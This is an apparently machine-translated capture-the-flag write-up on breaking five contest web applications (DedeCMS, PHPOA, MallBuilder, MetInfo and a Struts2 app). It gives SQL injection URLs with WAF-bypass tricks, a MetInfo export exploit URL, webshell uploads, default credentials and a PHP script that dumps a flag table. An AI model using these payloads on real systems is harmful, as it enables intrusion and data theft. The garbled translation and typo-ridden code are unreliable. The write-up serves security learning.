"Security think tank": 48H quickly win the Flag War Customs clearance writeup (Customs policy)

Source: Internet
Author: User

bystudent

Title Name Topic Score Address
MallBuilder2 350 mall.anquanbao.com.cn
MallBuilder1 200 mall.anquanbao.com.cn
DedeCMS2 300 cms.anquanbao.com.cn
DedeCMS1 200 cms.anquanbao.com.cn
MetInfo2 300 info.anquanbao.com.cn
MetInfo1 200 info.anquanbao.com.cn
PHPOA2 200 oa.anquanbao.com.cn
PHPOA1 150 oa.anquanbao.com.cn
BugScan1 500 scan.anquanbao.com.cn

0x01 Dedecms

First saw the weaving dream, direct admin 123456 Log in, found that the left is blank.


Access File Manager directly from a file.

/dede/file_manage_main.php?activepath=/uploads

Found the first flag in the root directory, and then found that others are instantly 750 points, and then looked at the next flag.txt, get three flag.

Upload and the like are not, directly write a pht seconds. But the server special card, is also drunk, a word not even on, on a big horse, and then find the database configuration file, found after found unreadable. Is stuck when found flag.txt was deleted, background password has been changed, so ah, changed the backstage, deleted a lot of important documents.

Finally found that the file is 777, and then changed the config to. txt, and then read the configuration file.


But the WAF is strong.

Can log into the database, you can see the table Dede_flag, but is unable to read the data, simply write a php file read it.

0x02 Phpoa

This cloud has cases, with scripts, arbitrary file upload. Directly to a big horse, this database can be read directly, read and then write a PHP file read the database flag.

Case Portal:

http://www.wooyun.org/bugs/wooyun-2010-163275

But now (when writing writeup) The above method is no longer available, a lot of things are filtered, but you can pass a sentence, and then post so read.

Then write the file to read flag.

getflag.php

<?php

$con = mysql_connect ("localhost", "root", "2C2984BG");

$db _selected = mysql_selecst_db ("flag", $con);

$sql = "SELECT * from flag";

$result = mysql_query ($sql, $con);

while ($row = Mysql_fetch_array ($result)) {

Var_dump ($row);

}

Mysql_free_result ($result);

Mysql_close ($con);

?>

0x03 Mallbuilder

Flag.txt this time can not access, access to 405, casually add a post to bypass.

The cloud was searched, and the Mallbuilder parameter brand injection vulnerability was found.

http://www.wooyun.org/bugs/wooyun-2010-0176842

But can only read the file, how also around the WAF, security Bao is very tough ah, everything is 405.

Then an article was searched, using decimals to bypass the space.

http://wooyun.org/bugs/wooyun-2010-0157857

Http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x ' and 1=2.11111order by 44%23

Ultimate payload

Http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x ' and 1=2.2union%0aselect%0a 1,2,3,4,5, (select name Fromflag), 7,8,9,10,user (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%23

0x04 Metinfo

Metinfo 5.2.4, this is a dark cloud case: Metinfo Latest Version (5.2.4) a SQL blind vulnerability

http://www.wooyun.org/bugs/wooyun-2014-055338

The simplest way to do this is to change the table name to flag and then download an Excel table that opens flag because flag is set to the table name ... Orz

http://info.anquanbao.com.cn//admin/content/feedback/export.php?met_parameter_1=flag--;&class1=1& Settings_arr[0][columnid]=1&settings_arr[0][name]=met_parameter


0x05 Bugscan

This is the first random try, tomcat/7.0.68. Found this:

Http://scan.anquanbao.com.cn/memoedit.action

Speculation is Struts2, with tools tested, there is a s2-032, but the WAF intercept command execution.


Tried a lot of ways to bypass the way around, no matter what all interception, is also a wonderful Ah, finally helpless, or with the most traditional method: The long URL around the past, 100w+. Flag is under the root directory.


© This article is for the original author of "Security Think tank", reproduced please specify copyright.

"Security think tank": 48H quickly win the Flag War Customs clearance writeup (Customs policy)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.